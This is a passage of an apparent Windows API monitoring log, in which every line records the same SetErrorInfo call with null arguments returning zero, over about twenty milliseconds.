[0061.595] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.596] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.596] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.596] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.596] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.596] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.596] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.596] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.596] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.596] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.596] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.596] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.596] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.596] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.597] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.597] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.597] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.597] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.597] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.597] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.597] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.597] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.597] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.597] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.597] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.597] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.597] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.597] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.597] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.597] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.597] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.597] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.597] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.597] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.598] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.598] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.598] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.598] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.598] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.598] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.598] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.598] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.598] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.598] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.598] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.598] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.598] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.598] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.598] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.598] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.598] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.599] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.599] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.599] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.599] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.599] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.599] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.600] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.600] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.600] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.600] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.600] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.600] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.600] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.600] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.600] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.600] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.600] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.600] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.600] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.600] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.600] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.600] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.600] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.600] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.600] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.600] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.600] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.600] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.600] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.600] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.600] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.601] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.601] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.601] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.601] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.601] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.601] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.601] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.601] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.601] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.602] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.602] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.602] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.602] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.602] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.602] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.602] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.602] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.602] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.602] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.602] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.602] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.602] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.602] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.602] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.602] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.602] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.602] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.602] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.602] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.602] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.602] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.602] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.603] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.603] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.603] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.603] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.603] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.603] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.603] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.603] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.603] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.603] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.603] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.603] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.603] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.603] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.603] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.603] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.603] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.603] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.603] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.603] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.603] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.603] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.603] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.603] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.603] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.603] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.604] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.604] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.604] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.604] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.604] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.604] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.604] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.604] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.604] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.604] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.604] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.604] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.604] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.604] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.604] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.604] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.604] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.604] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.604] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.604] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.604] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.604] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.604] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.604] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.604] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.605] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.605] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.605] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.605] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.605] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.605] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.605] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.605] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.605] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.605] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.605] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.605] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.605] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.605] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.605] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.605] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.605] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.605] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.605] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.605] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.605] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.605] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.605] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.605] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.605] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.605] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.605] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.606] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.606] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.606] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.606] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.606] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.606] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.606] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.606] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.606] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.606] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.606] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.606] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.606] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.606] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.606] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.606] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.606] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.606] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.606] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.606] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.606] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.606] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.606] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.606] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.606] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.606] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.607] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.607] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.607] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.607] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.607] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.607] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.607] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.607] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.607] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.607] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.607] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.607] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.607] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.607] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.607] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.607] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.607] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.607] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.607] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.607] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.607] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.607] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.607] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.607] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.608] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.608] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.608] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.608] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.608] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.608] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.608] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.608] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.608] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.608] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.608] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.608] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.608] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.608] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.608] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.608] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.608] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.608] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.608] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.608] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.608] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.608] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.608] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.608] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.609] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.609] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.609] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.609] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.609] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.609] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.609] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.609] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.609] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.609] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.609] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.609] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.609] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.609] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.609] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.609] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.609] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.609] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.609] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.609] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.609] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.610] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.610] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.610] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.610] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.610] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.610] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.610] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.610] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.610] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.610] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.610] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.610] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.610] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.610] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.610] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.610] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.610] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.610] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.610] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.610] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.610] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.610] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.610] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.611] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.611] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.611] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.611] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.611] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.611] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.611] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.611] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.611] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.611] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.612] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.612] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.612] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.613] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.614] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.614] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.614] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.614] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.614] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.614] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.614] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.614] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.614] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.614] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.614] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.615] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.615] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.615] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.615] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.615] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.615] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.615] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.615] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.615] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.615] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.615] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.615] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.615] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.615] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.615] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.615] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.615] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.615] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.615] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.615] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.615] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.615] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
